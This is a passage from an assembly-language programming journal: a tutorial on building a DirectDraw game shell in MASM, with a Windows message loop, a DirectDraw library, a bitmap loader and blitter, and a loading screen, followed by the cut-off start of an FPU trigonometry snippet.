Now that we all know how to use our assembler, and the features contained in it, lets get a basic game shell up and running. The first thing we need to do is get setup to enter into WinMain(). You may be wondering why the code doesn't start at WinMain() like in C/C++. The answer is: in C/C++ it doesn't start there either. The code that we will write is generated for you by the compiler, therefore it is completely transparent to you. We will most likely do it differently than the compiler, but the premise will be the same. So here is what we will code to get into the WinMain() function... .CODE start: ;================================== ; Obtain the instance for the ; application ;================================== INVOKE GetModuleHandle, NULL MOV hInst, EAX ;================================== ; Is there a commandline to parse? ;================================== INVOKE GetCommandLine MOV CommandLine, EAX ;================================== ; Call the WinMain procedure ;================================== INVOKE WinMain,hInst,NULL,CommandLine,SW_SHOWDEFAULT ;================================== ; Leave the program ;================================== INVOKE ExitProcess,EAX The only thing that may seem a little confusing is why we MOV EAX into a variable at the end of a INVOKE. The reason is all Windows functions, and C functions for that matter, place the return value of a function/procedure in EAX. So we are effectively doing an assignment statement with a function when we move a value from EAX into something. This code above is going to be the same for every Windows application that you write. At least, I have never had need to change it. The code simply sets everything up and ends it when we are finished. If you follow the code you will see that it calls WinMain() for us. This is where things can get a bit confusing ... so let's have a look at the code first. ;######################################################################## ; WinMain Function ;######################################################################## WinMain PROC hInstance :DWORD, hPrevInst :DWORD, CmdLine :DWORD, CmdShow :DWORD ;==================== ; Put LOCALs on stack ;==================== LOCAL wc :WNDCLASS ;================================================== ; Fill WNDCLASS structure with required variables ;================================================== MOV wc.style, CS_OWNDC MOV wc.lpfnWndProc,OFFSET WndProc MOV wc.cbClsExtra,NULL MOV wc.cbWndExtra,NULL m2m wc.hInstance,hInst ;<< NOTE: macro not mnemonic INVOKE GetStockObject, BLACK_BRUSH MOV wc.hbrBackground, EAX MOV wc.lpszMenuName,NULL MOV wc.lpszClassName,OFFSET szClassName INVOKE LoadIcon, hInst, IDI_ICON ; icon ID MOV wc.hIcon,EAX INVOKE LoadCursor,NULL,IDC_ARROW MOV wc.hCursor,EAX ;================================ ; Register our class we created ;================================ INVOKE RegisterClass, ADDR wc ;=========================================== ; Create the main screen ;=========================================== INVOKE CreateWindowEx,NULL, ADDR szClassName, ADDR szDisplayName, WS_POPUP OR WS_CLIPSIBLINGS OR \ WS_MAXIMIZE OR WS_CLIPCHILDREN, 0,0,640,480, NULL,NULL, hInst,NULL ;=========================================== ; Put the window handle in for future uses ;=========================================== MOV hMainWnd, EAX ;==================================== ; Hide the cursor ;==================================== INVOKE ShowCursor, FALSE ;=========================================== ; Display our Window we created for now ;=========================================== INVOKE ShowWindow, hMainWnd, SW_SHOWDEFAULT ;================================= ; Intialize the Game ;================================= INVOKE Game_Init ;======================================== ; Check for an error if so leave ;======================================== .IF EAX != TRUE JMP shutdown .ENDIF ;=================================== ; Loop until PostQuitMessage is sent ;=================================== .WHILE TRUE INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE .IF (EAX != 0) ;=================================== ; Break if it was the quit message ;=================================== MOV EAX, msg.message .IF EAX == WM_QUIT ;====================== ; Break out ;====================== JMP shutdown .ENDIF ;=================================== ; Translate and Dispatch the message ;=================================== INVOKE TranslateMessage, ADDR msg INVOKE DispatchMessage, ADDR msg .ENDIF ;================================ ; Call our Main Game Loop ; ; NOTE: This is done every loop ; iteration no matter what ;================================ INVOKE Game_Main .ENDW shutdown: ;================================= ; Shutdown the Game ;================================= INVOKE Game_Shutdown ;================================= ; Show the Cursor ;================================= INVOKE ShowCursor, TRUE getout: ;=========================== ; We are through ;=========================== return msg.wParam WinMain endp ;######################################################################## ; End of WinMain Procedure ;######################################################################## This is quite a bit of code and is rather daunting at first glance. But, let's examine it a piece at a time. First we enter the function, notice that the local variables ( in this case a WNDCLASS variable ) get placed on the stack without your having to code anything. The code is generated for you ... you can declare local variables like in C. Thus, at the end of the procedure we don't need to tell the assembler how much to pop off of the stack ... it is done for us also. Then, we fill in this structure with various values and variables. Note the use of m2m. This is because in ASM you are not allowed to move a memory value to another memory location w/o placing it in a register, or on the stack first. Next, we make some calls to register our window class and create a new window. Then, we hide the cursor. You may want the cursor ... but for our game we do not. Now we can show our window and try to initialize our game. We check for an error after calling the Game_Init() procedure. If there was an error the function would not return true and this would cause our program to jump to the shutdown label. It is important that we jump over the main message loop. If we do not, the program will continue executing. Also, make sure that you do not just return out of the code ... there still may be some things that need to be shutdown. It is good practice in ASM, just as in all other languages, to have one entry point and one exit point in each of your procedures -- this makes debugging easier. Now for the meat of WinMain(): the message loop. For those of you that have never seen a Windows message loop before here is a quick explanation. Windows maintains a queue of messages that the application receives -- whether from other applications, user generated, or internal. In order to do ANYTHING an application must process messages. These tell you that a key has been pressed, the mouse button clicked, or the user wants to exit your program. If this were a normal program, and not a high performance game, we would use GetMessage() to retrieve a message from the queue and act upon it. The problem however is, if there are no messages, the function WAITS until it receives one. This is totally unacceptable for a game. We need to be constantly performing our loop, no matter what messages we receive. So, one way around this, is to use PeekMessage() instead. PeekMessage() will return zero if it has no messages, otherwise it will grab it off of the queue. What this means is, if we have a message, it will get translated and dispatched to our callback function. Furthermore, if we do not, then the main game loop will be called instead. Now here is the trick, by arranging the code just right, the main game loop will be called -- even if we process a message. If we did not do this, then Windows could process 1,000's of messages while our game loop wouldn't execute once! Finally, when a quit message is passed to the queue we will jump out of our loop and execute the shutdown code. And that ... is the basic game loop. Connecting to Direct Draw ------------------------- Now we are going to get a little bit advanced. But, only for this section. Unfortunately there is no cut and dry way to view DirectX in assembly. So, I am going to explain it briefly, show you how to use it, and then forget about it. This is not that imperative to know about, but it helps if you at least understand the concepts. The very first thing you need to understand is the concept of a Virtual Function Table. This is where your call really goes to be blunt about it. The call offsets into this table, and from it selects the proper function address to jump to. What this means to you is your call to a function is actually a call to a simple look-up table that is already generated. in this way, DirectX or any other type library such as DirectX can change functions in a library w/o you ever having to know about it. Once we have gotten that straight we can figure out how to make calls in DirectX. Have you guessed how yet? The answer is we need to mimic the table in some way so that our call is offset into the virtual table at the proper address. We start by simply having a base address that gets called, which is a given in DirectX libraries. Then we make a list of all functions for that object appending the size of their parameters. This is our offset into the table. Now, we are all set to call the functions. Calling these functions can be a bit of work. First you have to specify the address of the object that you want to make the call on. Then, you have to resolve the virtual address, and then, finally, push all of the parameters onto the stack, including the object, for the call. Ugly isn't it? For that reason there is a set of macros provided that will allow you to make calls for these objects fairly easily. I will only cover one since the rest are based on the same premise. The most basic one is DD4INVOKE. This macro is for a Direct Draw 4 object. It is important that we have different invokes for different versions of the same object. If we did not, then wrong routines would be called since the Virtual Table changes as they add/remove functions from the lib's. The idea behind the macro is fairly simple. First, you specify the function name, then the object name, and then the parameters. Here is an example: ;======================================== ; Now create the primary surface ;======================================== DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL The above line of code calls the CreateSurface() function on a Direct Draw 4 object. It passes the pointer to the object, the address of a Direct Draw Surface Describe structure, the address of the variable to hold the pointer to the surface, and finally NULL. This call is an example of how we will interface to DirectX in this article series. Now that we have seen how to make calls to DirectX, we need to build a small library for us to use which we cover in the next section. Our Direct Draw Library ----------------------- Alright, we are now ready to start coding our Direct Draw library routines. So, the logical starting place would be figuring out what kinds of routines we will need for the game. Obviously we want an initialization and shutdown routine, and we are going to need a function to lock and unlock surfaces. Also, it would be nice to have a function to draw text, and, since the game is going to run in 16 bpp mode, we will want a function that can figure out the pixel format for us. It would also be a good idea to have a function that creates surfaces, loads a bitmap into a surface, and a function to flip our buffers for us. That should cover it ... so lets get started. The first routine that we will look at is the initialization routine. This is the most logical place to start, especially since the routine has just about every type of call we will be using in Direct Draw. Here is the code: ;######################################################################## ; DD_Init Procedure ;######################################################################## DD_Init PROC screen_width:DWORD, screen_height:DWORD, screen_bpp:DWORD ;======================================================= ; This function will setup DD to full screen exclusive ; mode at the passed in width, height, and bpp ;======================================================= ;================================= ; Local Variables ;================================= LOCAL lpdd_1 :LPDIRECTDRAW ;============================= ; Create a default object ;============================= INVOKE DirectDrawCreate, 0, ADDR lpdd_1, 0 ;============================= ; Test for an error ;============================= .IF EAX != DD_OK ;====================== ; Give err msg ;====================== INVOKE MessageBox, hMainWnd, ADDR szNoDD, NULL, MB_OK ;====================== ; Jump and return out ;====================== JMP err .ENDIF ;========================================= ; Lets try and get a DirectDraw 4 object ;========================================= DDINVOKE QueryInterface, lpdd_1, ADDR IID_IDirectDraw4, ADDR lpdd ;========================================= ; Did we get it?? ;========================================= .IF EAX != DD_OK ;============================== ; No so give err message ;============================== INVOKE MessageBox, hMainWnd, ADDR szNoDD4, NULL, MB_OK ;====================== ; Jump and return out ;====================== JMP err .ENDIF ;=================================================== ; Set the cooperative level ;=================================================== DD4INVOKE SetCooperativeLevel, lpdd, hMainWnd, \ DDSCL_ALLOWMODEX OR DDSCL_FULLSCREEN OR \ DDSCL_EXCLUSIVE OR DDSCL_ALLOWREBOOT ;========================================= ; Did we get it?? ;========================================= .IF EAX != DD_OK ;============================== ; No so give err message ;============================== INVOKE MessageBox, hMainWnd, ADDR szNoCoop, NULL, MB_OK ;====================== ; Jump and return out ;====================== JMP err .ENDIF ;=================================================== ; Set the Display Mode ;=================================================== DD4INVOKE SetDisplayMode, lpdd, screen_width, \ screen_height, screen_bpp, 0, 0 ;========================================= ; Did we get it?? ;========================================= .IF EAX != DD_OK ;============================== ; No so give err message ;============================== INVOKE MessageBox, hMainWnd, ADDR szNoDisplay, NULL, MB_OK ;====================== ; Jump and return out ;====================== JMP err .ENDIF ;================================ ; Save the screen info ;================================ m2m app_width, screen_width m2m app_height, screen_height m2m app_bpp, screen_bpp ;======================================== ; Setup to create the primary surface ;======================================== DDINITSTRUCT OFFSET ddsd, SIZEOF(DDSURFACEDESC2) MOV ddsd.dwSize, SIZEOF(DDSURFACEDESC2) MOV ddsd.dwFlags, DDSD_CAPS OR DDSD_BACKBUFFERCOUNT; MOV ddsd.ddsCaps.dwCaps, DDSCAPS_PRIMARYSURFACE OR \ DDSCAPS_FLIP OR DDSCAPS_COMPLEX MOV ddsd.dwBackBufferCount, 1 ;======================================== ; Now create the primary surface ;======================================== DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL ;========================================= ; Did we get it?? ;========================================= .IF EAX != DD_OK ;============================== ; No so give err message ;============================== INVOKE MessageBox, hMainWnd, ADDR szNoPrimary, NULL, MB_OK ;====================== ; Jump and return out ;====================== JMP err .ENDIF ;========================================== ; Try to get a backbuffer ;========================================== MOV ddscaps.dwCaps, DDSCAPS_BACKBUFFER DDS4INVOKE GetAttachedSurface, lpddsprimary, ADDR ddscaps, ADDR lpddsback ;========================================= ; Did we get it?? ;========================================= .IF EAX != DD_OK ;============================== ; No so give err message ;============================== INVOKE MessageBox, hMainWnd, ADDR szNoBackBuffer, NULL, MB_OK ;====================== ; Jump and return out ;====================== JMP err .ENDIF ;========================================== ; Get the RGB format of the surface ;========================================== INVOKE DD_Get_RGB_Format, lpddsprimary done: ;=================== ; We completed ;=================== return TRUE err: ;=================== ; We didn't make it ;=================== return FALSE DD_Init ENDP ;######################################################################## ; END DD_Init ;######################################################################## The above code is fairly complex so let's see what each individual section does. The first step is we create a default Direct Draw object. This is nothing more than a simple call with a couple of parameters. NOTE: since it is NOT based on an already created object, the function is not virtual. Therefore, we can call it like a normal function using invoke. Also, notice how we check for an error right afterwards. This is very important in DirectX. In the case of an error, we merely give a message, and then jump to the error return at the bottom of the procedure. The second step is we query for a DirectDraw4 object. We will almost always want the newest version of the objects, and querying after you have the base object is the way to get them. If this succeeds we then set the cooperative level and the display mode for our game. Nothing major ... but don't forget to check for errors. Our next step is to create a primary surface for the object that we have. If that succeeds we create the back buffer. The structure that we use in this call, and other DirectX calls, needs to be cleared before using it. This is done in a macro, DDINITSTRUCT, that I have included in the DDraw.inc file. The final thing we do is make a call to our routine that determines the pixel format for our surfaces. All of these pieces fit together into initializing our system for use. The next routine we will look at is the pixel format obtainer. This is a fairly advanced routine so I wanted to make sure that we cover it. Here is the code: ;######################################################################## ; DD_Get_RGB_Format Procedure ;######################################################################## DD_Get_RGB_Format PROC surface:DWORD ;========================================================= ; This function will setup some globals to give us info ; on whether the pixel format of the current diaplay mode ;========================================================= ;==================================== ; Local variables ;==================================== LOCAL shiftcount :BYTE ;================================ ; get a surface despriction ;================================ DDINITSTRUCT ADDR ddsd, sizeof(DDSURFACEDESC2) MOV ddsd.dwSize, sizeof(DDSURFACEDESC2) MOV ddsd.dwFlags, DDSD_PIXELFORMAT DDS4INVOKE GetSurfaceDesc, surface, ADDR ddsd ;============================== ; fill in masking values ;============================== m2m mRed, ddsd.ddpfPixelFormat.dwRBitMask ; Red Mask m2m mGreen, ddsd.ddpfPixelFormat.dwGBitMask ; Green Mask m2m mBlue, ddsd.ddpfPixelFormat.dwBBitMask ; Blue Mask ;==================================== ; Determine the pos for the red mask ;==================================== MOV shiftcount, 0 .WHILE (!(ddsd.ddpfPixelFormat.dwRBitMask & 1)) SHR ddsd.ddpfPixelFormat.dwRBitMask, 1 INC shiftcount .ENDW MOV AL, shiftcount MOV pRed, AL ;======================================= ; Determine the pos for the green mask ;======================================= MOV shiftcount, 0 .WHILE (!(ddsd.ddpfPixelFormat.dwGBitMask & 1)) SHR ddsd.ddpfPixelFormat.dwGBitMask, 1 INC shiftcount .ENDW MOV AL, shiftcount MOV pGreen, AL ;======================================= ; Determine the pos for the blue mask ;======================================= MOV shiftcount, 0 .WHILE (!(ddsd.ddpfPixelFormat.dwBBitMask & 1)) SHR ddsd.ddpfPixelFormat.dwBBitMask, 1 INC shiftcount .ENDW MOV AL, shiftcount MOV pBlue, AL ;=========================================== ; Set a special var if we are in 16 bit mode ;=========================================== .IF app_bpp == 16 .IF pRed == 10 MOV Is_555, TRUE .ELSE MOV Is_555, FALSE .ENDIF .ENDIF done: ;=================== ; We completed ;=================== return TRUE DD_Get_RGB_Format ENDP ;######################################################################## ; END DD_Get_RGB_Format ;######################################################################## First, we initialize our description structure and make a call to get the surface description from Direct Draw. We place the masks that are returned in global variables, since we will want to use them in all kinds of places. A mask is a value that you can use to set or clear certain bits in a variable/register. In our case, we use them to mask off the unnecessary bits so that we can access the red, green, or blue bits of our pixel individually. The next three sections of code are used to determine the number of bits in each color component. For example, if we had set the mode to 24 bpp, then there would be 8-bits in every component. The way we determine the number of bits it needs to be moved is by shifting each mask to the right by 1 and AND'ing it with the number one. This allows us to effectively count all the bits we need to shift by in order to move our component into its proper position. This works because the mask is going to contain a 1 where the bits are valid. So, by AND'ing it with the 1 we are able to see if the bit was turned on or not, since the number one will leave only the first bit set and turn all others off. Finally, we set a variable that tells us whether or not the video mode is 5-5-5 or 5-6-5. This is extremely important since 16 bpp mode can be either, and we do not want our pictures to have a green or purple tint on one machine, and look fine on another one! The last function that I want to cover in our Direct Draw library is the text drawing function. This uses GDI and so I figured I should at least give it a small explanation. The code ... ;######################################################################## ; DD_Draw_Text Procedure ;######################################################################## DD_Draw_Text PROC surface:DWORD, text:DWORD, num_chars:DWORD, x:DWORD, y:DWORD, color:DWORD ;======================================================= ; This function will draw the passed text on the passed ; surface using the passed color at the passed coords ; with GDI ;======================================================= ;=========================================== ; First we need to get a DC for the surface ;=========================================== DDS4INVOKE GetDC, surface, ADDR hDC ;=========================================== ; Set the text color and BK mode ;=========================================== INVOKE SetTextColor, hDC, color INVOKE SetBkMode, hDC, TRANSPARENT ;=========================================== ; Write out the text at the desired location ;=========================================== INVOKE TextOut, hDC, x, y, text, num_chars ;=========================================== ; release the DC we obtained ;=========================================== DDS4INVOKE ReleaseDC, surface, hDC done: ;=================== ; We completed ;=================== return TRUE DD_Draw_Text ENDP ;######################################################################## ; END DD_Draw_Text ;######################################################################## Following this code is relatively simple. First, we get the Device Context for our surface. In Windows, drawing is typically done through these DC's ( Device Contexts ), thus ... if you want to use any GDI function in Direct Draw the first thing you have to do is get the DC for your surface. Then, we set the background mode and text color using basic Windows GDI calls. Now, we are ready to draw our text ... again we just make a call to the Windows function TextOut(). There are many others, this is just the one that I chose to use. Finally, we release the DC for our surface. The rest of the Direct Draw routines follow the same basic format and use the same types of calls, so they shouldn't be too hard to figure out. The basic idea behind all of the routines is the same: encapsulate the functionality we need into some services that still allow us to be flexible. Now, we need to write the code to handle our bitmaps that go into these surfaces. Our Bitmap Library ------------------ We are now ready to write our bitmap library. We will start like the Direct Draw library by determining what we need. As far as I can tell right now, we should be good with two simple routines: a bitmap loader, and a draw routine. Since we will be using surfaces, the draw routine should draw onto the passed surface. Our loader will load our special file format which I will cover in a moment. That should be it, there isn't that much that is needed for bitmaps nowadays. DirectX is how most manipulation occurs, especially since many things can be done in hardware. With that in mind we will cover our unique file format. Normally, creating your own file format is a headache and isn't worth the trouble. However, in our case it greatly simplifies the code and I have provided the conversion utility with the download package. This format is probably one of the easiest you will ever encounter. It has five main parts: Width, Height, BPP, Size of Buffer, and Buffer. The first three give information on the image. I have our library setup for 16 bpp only but implementing other bit depths would be fairly easy. The fourth section tells us how large of a buffer we need for the image, and the fifth section is that buffer. Having our own format not only makes the code we need to write a lot easier, it also prevents other people from seeing our work before they were meant to see it! Now, how do we load this bad boy? ;######################################################################## ; Create_From_SFP Procedure ;######################################################################## Create_From_SFP PROC ptr_BMP:DWORD, sfp_file:DWORD, desired_bpp:DWORD ;========================================================= ; This function will allocate our bitmap structure and ; will load the bitmap from an SFP file. Converting if ; it is needed based on the passed value. ;========================================================= ;================================= ; Local Variables ;================================= LOCAL hFile :DWORD LOCAL hSFP :DWORD LOCAL Img_Left :DWORD LOCAL Img_Alias :DWORD LOCAL red :DWORD LOCAL green :DWORD LOCAL blue :DWORD LOCAL Dest_Alias :DWORD ;================================= ; Create the SFP file ;================================= INVOKE CreateFile, sfp_file, GENERIC_READ,FILE_SHARE_READ, \ NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL MOV hFile, EAX ;=============================== ; Test for an error ;=============================== .IF EAX == INVALID_HANDLE_VALUE JMP err .ENDIF ;=============================== ; Get the file size ;=============================== INVOKE GetFileSize, hFile, NULL PUSH EAX ;================================ ; test for an error ;================================ .IF EAX == -1 JMP err .ENDIF ;============================================== ; Allocate enough memeory to hold the file ;============================================== INVOKE GlobalAlloc, GMEM_FIXED, EAX MOV hSFP, EAX ;=================================== ; test for an error ;=================================== .IF EAX == 0 JMP err .ENDIF ;=================================== ; Put the file into memory ;=================================== POP EAX INVOKE ReadFile, hFile, hSFP, EAX, OFFSET Amount_Read, NULL ;==================================== ; Test for an error ;==================================== .IF EAX == FALSE ;======================== ; We failed so leave ;======================== JMP err .ENDIF ;=================================== ; Determine the size without the BPP ;=================================== MOV EBX, hSFP MOV EAX, DWORD PTR [EBX] ADD EBX, 4 MOV ECX, DWORD PTR [EBX] MUL ECX PUSH EAX ;====================================== ; Do we allocate a 16 or 24 bit buffer ;====================================== .IF desired_bpp == 16 ;============================ ; Just allocate a 16-bit ;============================ POP EAX SHL EAX, 1 INVOKE GlobalAlloc, GMEM_FIXED, EAX MOV EBX, ptr_BMP MOV DWORD PTR [EBX], EAX MOV Dest_Alias, EAX ;==================================== ; Test for an error ;==================================== .IF EAX == FALSE ;======================== ; We failed so leave ;======================== JMP err .ENDIF .ELSE ;======================================== ; This is where code for 24 bit would go ;======================================== ;============================ ; For now just return an err ;============================ JMP err .ENDIF ;==================================== ; Setup for reading in ;==================================== MOV EBX, hSFP ADD EBX, 10 MOV EAX, DWORD PTR[EBX] MOV Img_Left, EAX ADD EBX, 4 MOV Img_Alias, EBX ;==================================== ; Now lets start converting values ;==================================== .WHILE Img_Left > 0 ;================================== ; Build a color word based on ; the desired BPP or transfer ;================================== .IF desired_bpp == 16 ;========================================== ; Read in a byte for blue, green and red ;========================================== XOR ECX, ECX MOV EBX, Img_Alias MOV CL, BYTE PTR [EBX] MOV blue, ECX INC EBX MOV CL, BYTE PTR [EBX] MOV green, ECX INC EBX MOV CL, BYTE PTR [EBX] MOV red, ECX ;======================= ; Adjust the Img_Alias ;======================= ADD Img_Alias, 3 ;================================ ; Do we build a 555 or a 565 val ;================================ .IF Is_555 == TRUE ;============================ ; Build the 555 color word ;============================ RGB16BIT_555 red, green, blue .ELSE ;============================ ; Build the 565 color word ;============================ RGB16BIT_565 red, green, blue .ENDIF ;================================ ; Transer it to the final buffer ;================================ MOV EBX, Dest_Alias MOV WORD PTR [EBX], AX ;============================ ; Adjust the dest by 2 ;============================ ADD Dest_Alias, 2 .ELSE ;======================================== ; This is where code for 24 bit would go ;======================================== ;============================ ; For now just return an err ;============================ JMP err .ENDIF ;===================== ; Sub amount left by 3 ;===================== SUB Img_Left, 3 .ENDW ;==================================== ; Free the SFP Memory ;==================================== INVOKE GlobalFree, hSFP done: ;=================== ; We completed ;=================== return TRUE err: ;==================================== ; Free the SFP Memory ;==================================== INVOKE GlobalFree, hSFP ;=================== ; We didn't make it ;=================== return FALSE Create_From_SFP ENDP ;######################################################################## ; END Create_From_SFP ;######################################################################## The code starts out by creating the file, which, in Windows, is how you open it, and then retrieves the file size. This allows us to allocate enough memory to load our entire file in. The process of reading in the file is fairly simple we just make a call. As usual the most important parts are those that check for errors. Once the file is in memory we compute the size of the desired image based upon the width and height in our header, and the "desired_bpp" level that was passed in to the function. Then we allocate yet another buffer with the information we calculated. This is the buffer that is kept in the end. The next step is the heart of our load function. Here we read in 3 bytes, since our pictures are stored as 24-bit images, and create the proper color value ( 5-6-5 or 5-5-5 ) for the buffer. We then store that value in the new buffer that we just created. We loop through all pixels in our bitmap and convert each to the desired format. The conversion is based on a pre-defined macro. You could also implement the function by using the members we filled, when we called the function to get the pixel format. This second way would allow you to have a more abstract interface to the code ... but for our purposes it was better to see what was really happening to the bits. At the completion of our loop we free the main buffer and return the address of the buffer with our converted pixel values. If an error occurs at any point, we jump to our error code which frees the possible buffer we could have created. This is to prevent memory leaks. And ... that is it for the load function. Once the bitmap is loaded into memory we need to be able to draw it onto a Direct Draw surface. Whether we are loading it in there permanently, or just drawing a quick picture onto the back buffer should not matter. So, we will look at a function that draws the passed bitmap onto our passed surface. Here is the code: ;######################################################################## ; Draw_Bitmap Procedure ;######################################################################## Draw_Bitmap PROC surface:DWORD, bmp_buffer:DWORD, lPitch:DWORD, bpp:DWORD ;========================================================= ; This function will draw the BMP on the surface. ; the surface must be locked before the call. ; ; It uses the width and height of the screen to do so. ; I hardcoded this in just 'cause ... okay. ; ; This routine does not do transparency! ;========================================================= ;=========================== ; Local Variables ;=========================== LOCAL dest_addr :DWORD LOCAL source_addr :DWORD ;=========================== ; Init the addresses ;=========================== MOV EAX, surface MOV EBX, bmp_buffer MOV dest_addr, EAX MOV source_addr, EBX ;=========================== ; Init counter with height ; ; Hard-coded in. ;=========================== MOV EDX, 480 ;================================= ; We are in 16 bit mode ;================================= copy_loop1: ;============================= ; Setup num of bytes in width ; ; Hard-coded also. ; ; 640*2/4 = 320. ;============================= MOV ECX, 320 ;============================= ; Set source and dest ;============================= MOV EDI, dest_addr MOV ESI, source_addr ;====================================== ; Move by DWORDS ;====================================== REP movsd ;============================== ; Adjust the variables ;============================== MOV EAX, lPitch MOV EBX, 1280 ADD dest_addr, EAX ADD source_addr, EBX ;======================== ; Dec the line counter ;======================== DEC EDX ;======================== ; Did we hit bottom? ;======================== JNE copy_loop1 done: ;=================== ; We completed ;=================== return TRUE err: ;=================== ; We didn't make it ;=================== return FALSE Draw_Bitmap ENDP ;######################################################################## ; END Draw_Bitmap ;######################################################################## This function is a little bit more advanced than some of the others we have seen, so pay attention. We know, as assembly programmers, that if we can get everything into a register things will be faster than if we had to access memory. So, in that spirit, we place the starting source and destination addresses into registers. Then, we compute the number of WORDS in our line. We can then divide this number by 2, so that we have the number of DWORDS in a line. I have hard-coded this number in since we will always be in 640 x 480 x 16 for our game. Once we have this number we place it in the register ECX. The reason for this is our next instruction MOVSD can be combined with the REP label. This will move a DWORD, decrement ECX by 1, compare ECX to ZERO if not equal then MOVE A DWORD, etc. until ECX is equal to zero. In short it is like having a For loop with the counter in ECX. As we have the code right now, it is moving a DWORD from the source into the destination until we have exhausted the number of DWORDS in our line. At which point it does this over again until we have reached the number of lines in our height ( 480 in our case ). Those are our only two functions in the bitmap module. They are short and sweet. More importantly, now that we have our bitmap and Direct Draw routines coded we can write the code to display our loading game screen! A Game ... Well, Kinda' ----------------------- The library routines are complete and we are now ready to plunge into our game code. We will start out by looking at the game initialization function since it is called first in our code. ;######################################################################## ; Game_Init Procedure ;######################################################################## Game_Init PROC ;========================================================= ; This function will setup the game ;========================================================= ;============================================ ; Initialize Direct Draw -- 640, 480, bpp ;============================================ INVOKE DD_Init, 640, 480, screen_bpp ;==================================== ; Test for an error ;==================================== .IF EAX == FALSE ;======================== ; We failed so leave ;======================== JMP err .ENDIF ;====================================== ; Read in the bitmap and create buffer ;====================================== INVOKE Create_From_SFP, ADDR ptr_BMP_LOAD, ADDR szLoading, screen_bpp ;==================================== ; Test for an error ;==================================== .IF EAX == FALSE ;======================== ; We failed so leave ;======================== JMP err .ENDIF ;=================================== ; Lock the DirectDraw back buffer ;=================================== INVOKE DD_Lock_Surface, lpddsback, ADDR lPitch ;============================ ; Check for an error ;============================ .IF EAX == FALSE ;=================== ; Jump to err ;=================== JMP err .ENDIF ;=================================== ; Draw the bitmap onto the surface ;=================================== INVOKE Draw_Bitmap, EAX, ptr_BMP_LOAD, lPitch, screen_bpp ;=================================== ; Unlock the back buffer ;=================================== INVOKE DD_Unlock_Surface, lpddsback ;============================ ; Check for an error ;============================ .IF EAX == FALSE ;=================== ; Jump to err ;=================== JMP err .ENDIF ;===================================== ; Everything okay so flip displayed ; surfaces and make loading visible ;====================================== INVOKE DD_Flip ;============================ ; Check for an error ;============================ .IF EAX == FALSE ;=================== ; Jump to err ;=================== JMP err .ENDIF done: ;=================== ; We completed ;=================== return TRUE err: ;=================== ; We didn't make it ;=================== return FALSE Game_Init ENDP ;######################################################################## ; END Game_Init ;######################################################################## This function plays the most important part in our game so far. In this routine we make the call to initialize Direct Draw. If this succeeds we load in our "Loading Game " bitmap file from disk. After that we lock the back buffer. This is very important to do since we will be accessing the memory directly. After it is locked we can draw our bitmap onto the surface and then unlock it. The final call in our procedure is to flip the buffers. Since we have the bitmap on the back buffer, we need it to be visible. Therefore, we exchange the buffers. The front goes to the back and the back goes to the front. At the completion of this call our bitmap is now visible on screen. One thing that may be confusing here is why we didn't load the bitmap into a Direct Draw surface. The reason is we will only be using it once so there was no need to waste a surface. Next on our list of things to code is the Windows callback function itself. This function is how we handle messages in Windows. Anytime we want to handle a message the code will go in this function. Take a look at how we have it setup currently. ;######################################################################## ; Main Window Callback Procedure -- WndProc ;######################################################################## WndProc PROC hWin :DWORD, uMsg :DWORD, wParam :DWORD, lParam :DWORD .IF uMsg == WM_COMMAND ;=========================== ; We don't have a menu, but ; if we did this is where it ; would go! ;=========================== .ELSEIF uMsg == WM_KEYDOWN ;======================================= ; Since we don't have a Direct input ; system coded yet we will just check ; for escape to be pressed ;======================================= MOV EAX, wParam .IF EAX == VK_ESCAPE ;=========================== ; Kill the application ;=========================== INVOKE PostQuitMessage,NULL .ENDIF ;========================== ; We processed it ;========================== return 0 .ELSEIF uMsg == WM_DESTROY ;=========================== ; Kill the application ;=========================== INVOKE PostQuitMessage,NULL return 0 .ENDIF ;================================================= ; Let the default procedure handle the message ;================================================= INVOKE DefWindowProc,hWin,uMsg,wParam,lParam RET WndProc endp ;######################################################################## ; End of Main Windows Callback Procedure ;######################################################################## The code is fairly self-explanatory. So far we only deal with 2 messages the WM_KEYDOWN message and the WM_DESTROY message. We process the WM_KEYDOWN message so that the user can hit escape and exit our game. We will be coding a Direct Input system, but until then we needed a way to quit the game! The one thing you should notice is that any messages we do not deal with are handled by the "default" processing function -- DefWindowProc(). This function is defined by Windows already. You just need to call it whenever you do not handle a message. The game main function we aren't going to look at, simply because it is empty. We haven't added any solid code to our game loop yet. But, everything is prepared so that next time we can get to it. That then leaves us with the shutdown code. ;######################################################################## ; Game_Shutdown Procedure ;######################################################################## Game_Shutdown PROC ;============================================================ ; This shuts our game down and frees memory we allocated ;============================================================ ;=========================== ; Shutdown DirectDraw ;=========================== INVOKE DD_ShutDown ;========================== ; Free the bitmap memory ;========================== INVOKE GlobalFree, ptr_BMP_LOAD done: ;=================== ; We completed ;=================== return TRUE err: ;=================== ; We didn't make it ;=================== return FALSE Game_Shutdown ENDP ;######################################################################## ; END Game_Shutdown ;######################################################################## Here we make the call to shutdown our Direct Draw library, and we also free the memory we allocated earlier for the bitmap. We could have freed the memory elsewhere and maybe next issue we will. But, things are a bit easier to understand when all of your initialization and cleanup code is in one place. As you can see there isn't that much code in our game specific stuff. The majority resides in our modules, such as Direct Draw. This allows us to keep our code clean and any changes we may need to make later on a much easier since things aren't hard-coded inline. Anyway, the end result of what you have just seen is a Loading screen that is displayed until the user hits the escape key. And that ... primitive though it may be ... is our game thus far. Until Next Time ... ------------------- We covered a lot of material in this article. We now have a bitmap library, and a Direct Draw library for our game. These are core modules that you should be able to use in any game. By breaking up the code like this we are able to keep our game code separate from the library code. You do not want any module to be dependent on another module. In the next article we will be continuing our module development with Direct Input. We will also be creating our menu system next time. These two things should keep us busy. So, that is what you have to look forward to in the next installment. Once again young grasshoppers, until next time ... happy coding. Get the complete source for the game here: http://asmjournal.freeservers.com/files/game2.zip ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS Basic trigonometry functions by Eoin O'Callaghan ;Summary: Basic trigonometry functions not directly supported on the FPU ; (ArcCos, ArcSin, HSin, HCos and HTan). ;Compatibility: Floating-Point Unit. ;Notes: None. .data hPi dt 3FFFC90FDAA22168C235h ; tbyte iL2e dt 3FFEB17217F7D1CF79ACh ; tbyte half dd 